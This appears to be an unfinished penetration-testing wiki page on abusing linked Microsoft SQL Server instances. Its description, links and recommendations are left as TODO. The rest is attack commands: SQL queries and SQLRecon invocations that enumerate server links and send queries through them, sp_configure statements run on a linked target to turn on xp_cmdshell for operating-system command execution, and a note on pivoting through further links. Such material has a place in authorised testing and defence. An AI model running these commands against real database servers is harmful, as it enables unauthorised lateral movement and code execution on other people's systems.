Links Abuse
Table of contents
Vulnerability
TODO: Describe the vulnerability here.
Prerequisites
- Having sysadmin rights on the Microsoft SQL instance.
Exploit
To enumerate links with you instance, use SELECT srvname, srvproduct, rpcout FROM master..sysservers;
query or SQLRecon.
./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:links
To send a query to a linked instance, use SELECT * FROM OPENQUERY("$target", '$query');
or - again - SQLRecon.
./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:lquery /l:$target /c:"$query"
If RPC Out is enabled on the link, you can leverage it to enable xp_cmdshell with following queries.
EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [$target]
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [$target]
You can even list any further links on your target and renew the operation.
./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:llinks /l:$target
Useful links
- TODO: List links here.
Recommendations
- TODO: List recommendations here.